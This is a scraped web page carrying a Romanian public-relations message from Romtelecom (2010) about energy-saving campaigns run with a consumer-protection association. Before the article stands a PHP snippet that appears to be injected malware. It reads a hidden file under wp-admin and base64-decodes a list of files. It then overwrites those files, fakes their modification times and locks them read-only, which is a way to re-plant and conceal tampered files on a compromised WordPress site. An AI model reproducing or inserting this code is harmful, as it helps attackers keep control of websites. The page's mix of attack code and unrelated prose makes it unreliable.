$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Mesajul Romtelecom catre A.N.P.C.P.P.S.Romania – Asociatie de Consumatori – O noua atitudine

Colaborarea dintre Romtelecom şi Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din România a început în anul 2007, atunci când compania s-a implicat în proiectul “Închide. Stinge. Reciclează”.

În cadrul acestui proiect, Romtelecom a contribuit la informarea populaţiei cu privire la consumul raţional de resurse naturale, la micile schimbări ale modului actual de viaţă care pot deveni în timp, mari soluţii pentru salvarea planetei.

În anul 2009, Romtelecom în parteneriat cu ANPCPPSR, a lansat campania „Economiseşte pentru tine! Economiseşte pentru mâine!”. Îndemnul a venit să sublinieze nevoia actuală de a ne regândi în profunzime modul de viaţă, scara de valori şi priorităţile. Campania a avut ca scop reconsiderarea personală a felului în care ne raportăm la utilizarea resurselor pe care adeseori le tratăm ca inepuizabile, din neatenţie, grabă sau obişnuinţă.

Împreună cu partenerul nostru am încercat prin acest proiect să convingem oamenii să privească cu atenţie în jur şi să conştientizeze faptul că schimbările minore de atitudine, de comportament, de obişnuinţe pot aduce rezultate vizibile. Am făcut acest lucru pentru că suntem la rândul nostru implicaţi în ceea ce ne înconjoară, atât ca indivizi, cât şi ca organizaţie.

Este responsabilitatea noastră să aducem aminte oamenilor că fiecare gest responsabil este important, şi că implicându-ne, lăsăm urme şi contribuim la un viitor mai bun.

Cristina Popescu
Director Relaţii Publice Romtelecom, 2010

By o9admin